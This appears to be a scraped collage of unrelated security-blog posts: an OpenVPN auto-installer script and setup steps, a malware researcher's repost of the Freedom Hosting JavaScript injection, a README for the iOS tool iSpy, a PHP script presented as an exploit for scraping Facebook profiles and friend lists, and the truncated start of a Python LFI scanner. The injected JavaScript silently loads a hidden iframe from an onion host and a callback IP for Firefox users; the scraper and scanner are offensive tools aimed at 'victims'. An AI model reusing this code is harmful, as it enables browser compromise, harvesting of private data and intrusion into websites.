"$EASY_RSA/pkitool" $CLIENT # DH params . /etc/openvpn/easy-rsa/2.0/build-dh # Let's configure the server cd /usr/share/doc/openvpn/examples/sample-config-files gunzip -d server.conf.gz cp server.conf /etc/openvpn/ cd /etc/openvpn/easy-rsa/2.0/keys cp ca.crt ca.key dh2048.pem server.crt server.key /etc/openvpn cd /etc/openvpn/ # Set the server configuration sed -i 's|dh dh1024.pem|dh dh2048.pem|' server.conf sed -i 's|;push "redirect-gateway def1 bypass-dhcp"|push "redirect-gateway def1 bypass-dhcp"|' server.conf sed -i "s|port 1194|port $PORT|" server.conf # DNS case $DNS in 1) # Obtain the resolvers from resolv.conf and use them for OpenVPN grep -v '#' /etc/resolv.conf | grep 'nameserver' | grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | while read line; do sed -i "/;push \"dhcp-option DNS 208.67.220.220\"/a\push \"dhcp-option DNS $line\"" server.conf done ;; 2) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 208.67.222.222"|' server.conf sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 208.67.220.220"|' server.conf ;; 3) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 4.2.2.2"|' server.conf sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 4.2.2.4"|' server.conf ;; 4) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 129.250.35.250"|' server.conf sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 129.250.35.251"|' server.conf ;; 5) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 74.82.42.42"|' server.conf ;; 6) sed -i 's|;push "dhcp-option DNS 208.67.222.222"|push "dhcp-option DNS 77.88.8.8"|' server.conf sed -i 's|;push "dhcp-option DNS 208.67.220.220"|push "dhcp-option DNS 77.88.8.1"|' server.conf ;; esac # Listen at port 53 too if user wants that if [[ "$ALTPORT" = 'y' ]]; then iptables -t nat -A PREROUTING -p udp -d $IP --dport 53 -j REDIRECT --to-port $PORT sed -i "1 a\iptables -t nat -A PREROUTING -p udp -d $IP --dport 53 -j REDIRECT --to-port $PORT" /etc/rc.local fi # Enable net.ipv4.ip_forward for the system sed -i 's|#net.ipv4.ip_forward=1|net.ipv4.ip_forward=1|' /etc/sysctl.conf # Avoid an unneeded reboot echo 1 > /proc/sys/net/ipv4/ip_forward # Set iptables if [[ "$INTERNALNETWORK" = 'y' ]]; then iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $IP sed -i "1 a\iptables -t nat -A POSTROUTING -s 10.8.0.0/24 ! -d 10.8.0.0/24 -j SNAT --to $IP" /etc/rc.local else iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to $IP sed -i "1 a\iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to $IP" /etc/rc.local fi # And finally, restart OpenVPN /etc/init.d/openvpn restart # Try to detect a NATed connection and ask about it to potential LowEndSpirit # users EXTERNALIP=$(wget -qO- ipv4.icanhazip.com) if [[ "$IP" != "$EXTERNALIP" ]]; then echo "" echo "Looks like your server is behind a NAT!" echo "" echo "If your server is NATed (LowEndSpirit), I need to know the external IP" echo "If that's not the case, just ignore this and leave the next field blank" read -p "External IP: " -e USEREXTERNALIP if [[ "$USEREXTERNALIP" != "" ]]; then IP=$USEREXTERNALIP fi fi # IP/port set on the default client.conf so we can add further users # without asking for them sed -i "s|remote my-server-1 1194|remote $IP $PORT|" /usr/share/doc/openvpn/examples/sample-config-files/client.conf # Generate the client.ovpn newclient "$CLIENT" echo "" echo "Finished!" echo "" echo "Your client config is available at ~/$CLIENT.ovpn" echo "If you want to add more clients, you simply need to run this script another time!" fi to begin auto installer type: ./openvpn-install.sh Now if your main machines windows open notepad. go back to putty type: cat ro0ted.ovpn copy all of it to clipboard paste it in notepad>File>Save as>WhateverYouNamedTheClient.ovpn Check if your OpenVPN server is running type: ps ax|grep openvpn You should see something like this: Traffic forwarding has to be enabled for the VPN connection to work. type: nano /etc/sysctl.conf and enable ipv4 forwarding by un-commenting the line “net.ipv4.ip_forward=0? removing the # sign and changing 0 to 1 so it looks like this: net.ipv4.ip_forward=1 ctrl + X Select Y enable masquerading in firewall type: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE Go to Windows Download Openvpn: http://openvpn.net/index.php/open-source/downloads.html After you install it, transfer the ovpn-client1.tar.gz archive to your PC and unpack it to your OpenVPN GUI’s config folder (usually in “C:\Program Files(x86)\OpenVPN\config\”) Start OpenVPN GUI with right click, Run as Administrator (it works only when you run it as administrator). Right click on its System Tray icon and click connect. Source

# MalwareMustDie! # This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV # MalwareMustDie!# This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV // Case 1 function createCookie(name,value,minutes) { if (minutes) { var date = new Date(); date.setTime(date.getTime()+(minutes*60*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); } function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline"; iframe.frameBorder = "0"; iframe.scrolling = "no"; iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0"; iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); } function format_quick() { if ( ! readCookie("n_serv") ) { createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30); updatify(); } } function isReady() { if ( document.readyState === "interactive" || document.readyState === "complete" ) { if ( isFF() ) { format_quick(); } } else { setTimeout(isReady, 250); } } setTimeout(isReady, 250); // Case 2 function createCookie(name, value, minutes) { if (minutes) { var date = new Date(); date.setTime(date.getTime() + (minutes * 60 * 1000)); var expires = "; expires=" + date.toGMTString(); } else var expires = ""; document.cookie = name + "=" + value + expires + "; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length); } return null; } function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); } function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline"; iframe.frameBorder = "0"; iframe.scrolling = "no"; iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); } function freedomhost() { if (!readCookie("n_serv")) { createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30); updatify(); } } function isReady() { if (document.readyState === "interactive" || document.readyState === "complete") { if (isFF()) { //window.alert(window.location + "Firefox Detected.") freedomhost(); } } else { setTimeout(isReady, 250); } } setTimeout(isReady, 250); // Noted, same method, // second script is w/IP info callback, contacting remote host as per marked (1) IP Address: 65.222.202.53 City: Triadelphia State or Region: West Virginia Country: United States ISP: Verizon Business Latitude & Longitude: 40.0900-80.6220 Domain: verizonbusiness.com ZIP Code: 26059 --- #MalwareMustDie! @unixfreaxjp Source

iSpy aims to be your one-stop-shop for reverse engineering and dynamic analysis of iOS applications. Features : – Easy to use Web GUI – Class dumps – Instance tracking – Automatic jailbreak-detection bypasses – Automatic SSL certificate pinning bypasses – Re-implemented objc_msgSend for logging and tracing function calls in realtime – Cycript integration; access Cycript from your browser! – Anti-anti-method swizzling – Automatic detection of vulnerable function calls – Easy to use soft-breakpoints The current release is a developer preview; code is subject to change, and will be unstable. However, we appreciate code contributions, feature requests, and bug reports. We currently do not have binary releases, stay tuned! Injecting iSpy : 1. Once iSpy is installed onto your device open the Settings application and you should see a new entry for iSpy. Enable the iSpy Global On/Off if it is disabled. From this panel you can also enable hooks for SSL Certificate Pinning, change web server settings, and optional features. 2. From here go to Select Target Apps and enable the switch for whichever applications you want to inject iSpy into. 3. Open any of the selected applications and you should see a Showtime overlay message in the upper right as the application loads, this indicates that iSpy was successfully injected into the process. 4. Open your browser and go to http://<iPad IP Address>:31337, note that the default port is 31337 but can be optionally changed in the iOS Settings. If iSpy fails to bind to the desired port it will increment the port number until it successfully finds an unbound port to use; you can see this activity in the Xcode console. We also recommend forwarding your TCP connections over USB using the iPhone Data Protection Suite’s tcprelay.sh script. 5. Have fun! Prerequisites : + Xcode 5+ running on OSX 10.8+ + Any jailbroken iOS device running: 32bit iOS 6, 7, or 8 Other versions may work but have not been tested Theos Setup Follow this guide to setup Theos and Ldid. Clone Repos First do a recursive clone of the public repo: git clone https://github.com/BishopFox/iSpy --recursive Build CocoaHTTPServer Next we need to build the CocoaHTTPServer dependency, this step is optional as a binary is included with the main iSpy repo. cd iSpyServer/CocoaHTTPServer/ ./build.sh This will create a new CocoaHTTPServer.a file in the iSpy/libs directory. Compile iSpy Next build the main repo, cd back to the root of the main iSpy git repo and: make clean make make package This will produce a new .deb If you get the error: /Applications/Xcode.app/Contents/Developer/usr/bin/make package requires dpkg-deb. make: *** [internal-package-check] Error 1 t means you need to install the Debian package manager. I use Brew, so it was just a case of running brew install dpkg to get up and running. Install onto iOS Device iSpy has three binary dependancies on the iOS device: cycript, preferenceloader and applist the easiest way to install these is to ssh into your device and use apt-get: apt-get install cycript applist preferenceloader After that just install the .deb we compiled in the previous step dpkg -i <.deb file> Cycript Integration iSpy injects Cycript into the target app automatically by default. In order for the iSpy UI integration to work, you must first install Cycript onto your device (just use Cydia). Once installed, you can access Cycript from the iSpy UI by simply hitting the hotkey (ctrl-`). You can also connect remotely from a command-line, like so: cycript -r ip_of_your_device:12345 Download Zipball | or clone git here Sources : https://github.com/BishopFox iSpy – A reverse engineering framework for iOS.

*NAME*: INURL API facebook *TIPE*: TOOL - Capturing data facebook *Tested on*: Linux *EXECUTE*: php exploit.php perfilFacebook *AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL *EMAIL*: inurllbr@gmail.com *Blog*:http://blog.inurl.com.br *Twitter*: https://twitter.com/googleinurl *Fanpage*: https://fb.com/InurlBrasil *GIT: *https://github.com/googleinurl *PASTEBIN: *http://pastebin.com/u/Googleinurl *YOUTUBE: *https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/ *PRINT:* https://1.bp.blogspot.com/-GByN8EJG974/VKBxtKai66I/AAAAAAAADSQ/tdbuiZIZ0wI/s1600/Untitled-4.jpg <http://i.imgur.com/45BFlNe.png> *Description:* The script captures information through an api facebook, data that can be extracted: uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo, username Just to have an affinity or the User have not set the privacy of friends. it is possible to extract all friends of the victim. *Usage info:* php script.php {id/user} *Exploit:* <?php/* NAME: INURL API facebook TIPE: TOOL - Capturing data facebook Tested on: Linux EXECUTE: php exploit.php perfilFacebook AUTOR: Cleiton Pinheiro / NICK: GoogleINURL EMAIL: inurllbr@gmail.com Blog:http://blog.inurl.com.br Twitter: https://twitter.com/googleinurl Fanpage: https://fb.com/InurlBrasil GIT: https://github.com/googleinurl PASTEBIN: http://pastebin.com/u/Googleinurl YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl/ PRINT: https://1.bp.blogspot.com/-GByN8EJG974/VKBxtKai66I/AAAAAAAADSQ/tdbuiZIZ0wI/s1600/Untitled-4.jpg Description: The script captures information through an api facebook, data that can be extracted: uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo, username Just to have an affinity or the User have not set the privacy of friends. it is possible to extract all friends of the victim. ------------------------------------------------------ Usage info: php script.php {id/user} ------------------------------------------------------ #PHP Version 5.4.7 #php5-curl LIB #php5-cli LIB #Apache 2.4 #allow_url_fopen On #permission Reading #Operating system LINUX ------------------------------------------------------ */ error_reporting(0); ini_set('display_errors', 0); !isset($_SESSION) ? session_start() : NULL; $_SESSION['config'] = array(); system("command clear"); echo menu(); function getHttpResponseCode($url) { $curl = curl_init(); //print_r($url); curl_setopt($curl, CURLOPT_URL, ($url)); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //curl_setopt($curl, CURLOPT_PROXY,"localhost:8118"); return curl_exec($curl); } if (isset($argv[1]) && !empty($argv[1])) { $_SESSION['config'] = json_decode(getHttpResponseCode(" http://graph.facebook.com/{$argv[1]}"), true); $_SESSION['config2'] = getHttpResponseCode(" http://api.facebook.com/method/fql.query?query=" . urlencode("SELECT uid,username, name, first_name, middle_name, last_name, sex, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo, username FROM user WHERE uid ={$_SESSION['config']['id']}")); $xml = simplexml_load_string($_SESSION['config2']); $array_ = json_decode(json_encode((array) $xml), 1); $array = array($xml->getName() => $array_); echo "\033[1;34m ================================================================================================================ DADOS FACEBOOK ================================================================================================================ \n"; echo "\033[1;37m0x\033[0m\033[02;31mLINK:: \033[1;37m" . (isset($_SESSION['config']['link']) ? $_SESSION['config']['link'] : NULL ) . "\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mID:: \033[1;37m{$array['fql_query_response']['user']['uid']}\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mUSERNAME:: \033[1;37m{$array['fql_query_response']['user']['username']}\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mNOME:: \033[1;37m{$array['fql_query_response']['user']['name']}\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mPRIMEIRO NOME:: \033[1;37m{$array['fql_query_response']['user']['first_name']}\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mSOBRENOME:: \033[1;37m{$array['fql_query_response']['user']['last_name']}\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mSEXO:: \033[1;37m{$array['fql_query_response']['user']['sex']}\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mLOCAL:: \033[1;37m{$array['fql_query_response']['user']['locale']}\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO PEQUENA:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_small_with_logo']) . "\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO GRANDE:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_big_with_logo']) . "\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_square_with_logo']) . "\n\n"; echo "\033[1;37m0x\033[0m\033[02;31mFOTO:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_with_logo']) . "\n\n\033[0m"; echo " http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1\n "; $_SESSION['config3'] = getHttpResponseCode(" http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1 "); echo "================================================================================================================\n"; $cont = 0; $array2 = (explode('{"', $_SESSION['config3'])); foreach ($array2 as $valores) { $valores = str_replace('],"viewer_id":0},"bootloadable":{},"ixData":[]}', '', str_replace(',"n":"","it":null}', '', $valores)); $valores = str_replace('"u":', "\033[1;37mURL::\033[0m\033[1;34m", str_replace('t":', "\033[1;37mNOME::\033[0m\033[1;34m", str_replace('"i"', "\033[1;37mID::\033[0m\033[1;34m", str_replace('\/', '/', $valores)))); echo "\033[02;31m[\033[1;37m".$cont++."\033[02;31m]\033[0m - $valores\n"; } } else { echo menu() . " Falta definir parâmetro de busca, Exemplo=> php face.php usuario\n"; } function menu() { system("command clear"); return(" \033[1;37m _____ \033[1;37m(_____) \033[1;37m(\033[02;31m() ()\033[1;37m) \033[1;37m \ / \033[1;37m \ / \033[1;37m /=\ \033[1;37m [___] / Googleinurl - [ INURL API facebook ] \033[1;37m0xNeither war between hackers, nor peace for the system. \033[1;37m0x\033[0m\033[02;31mhttp://blog.inurl.com.br \033[1;37m0x\033[0m\033[02;31mhttps://fb.com/InurlBrasil \033[1;37m0x\033[0m\033[02;31mhttp://twitter.com/@googleinurl\033[0m [+] Pesquisa dados facebook, Ex: php face.php zuck "); } Source

~# python scanner.py $$\ $$$$$$$$\ $$$$$$\ $$ | $$ _____|\_$$ _| $$$$$$\ $$ | $$ | $$ | \____$$\ $$ | $$$$$\ $$ | $$$$$$$ |$$ | $$ __| $$ | $$ __$$ |$$ | $$ | $$ | \$$$$$$$ |$$$$$$$$\ $$ | $$$$$$\ \_______|\________|\__| \______| $$$$$$\ $$ __$$\ $$ / \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$\ \$$$$$$\ $$ _____|\____$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ \____$$\ $$ / $$$$$$$ |$$ | $$ |$$ | $$ |$$$$$$$$ |$$ | \__| $$\ $$ |$$ | $$ __$$ |$$ | $$ |$$ | $$ |$$ ____|$$ | \$$$$$$ |\$$$$$$$\$$$$$$$ |$$ | $$ |$$ | $$ |\$$$$$$$\ $$ | \______/ \_______|\_______|\__| \__|\__| \__| \_______|\__| An0th3r LFI sC4Nn3r v1.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww Usage: scanner.py -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent] Options: -h, --help show this help message and exit -u URL, --url=URL Insert URL: http[s]://www.victim.com -t TARGET, --target=TARGET Insert page: The name of the page to be scanned (Ex. index.php?page=) -p PORT, --port=PORT [Insert Port Number] - Default 80 or 443 --timeout=TIMEOUT [Timeout Value] - Default 10 -r, --random-agent [Set random UserAgent] #!/usr/bin/env python26import optparse import sys import urllib2, socket import random import re # # Banner aLFI banner = """ $$\ $$$$$$$$\ $$$$$$\\ $$ | $$ _____|\_$$ _| $$$$$$\ $$ | $$ | $$ | \____$$\ $$ | $$$$$\ $$ | $$$$$$$ |$$ | $$ __| $$ | $$ __$$ |$$ | $$ | $$ | \$$$$$$$ |$$$$$$$$\ $$ | $$$$$$\\ \_______|\________|\__| \______| $$$$$$\\ $$ __$$\\ $$ / \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$\\ \$$$$$$\ $$ _____|\____$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\\ \____$$\ $$ / $$$$$$$ |$$ | $$ |$$ | $$ |$$$$$$$$ |$$ | \__| $$\ $$ |$$ | $$ __$$ |$$ | $$ |$$ | $$ |$$ ____|$$ | \$$$$$$ |\$$$$$$$\\$$$$$$$ |$$ | $$ |$$ | $$ |\$$$$$$$\ $$ | \______/ \_______|\_______|\__| \__|\__| \__| \_______|\__| An0th3r LFI sC4Nn3r v1.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent]\n') commandList.add_option('-u', '--url', action="store", dest="url", help="Insert URL: http://www.victim.com", ) commandList.add_option('-t', '--target', action="store", dest="target", help="Insert page: The name of the page to be scanned (Ex. index.php?page=)", ) commandList.add_option('-p', '--port', action="store", dest="port", default=0, type="int", help="[insert Port Number] - Default 80 or 443", ) commandList.add_option('--timeout', action="store", dest="timeout", default=10, type="int", help="[Timeout Value] - Default 10", ) commandList.add_option('-r', '--random-agent', action="store_true", dest="randomagent", default=False, help="[set random UserAgent]", ) options, remainder = commandList.parse_args() # Usage: if ( not options.url or not options.target): print(banner) print commandList.print_help() sys.exit(1) # # UserAgent list # Top UA 18/08/2014 # http://techblog.willshouse.com/2012/01/03/most-common-user-agents/ def randomAgentGen(): userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 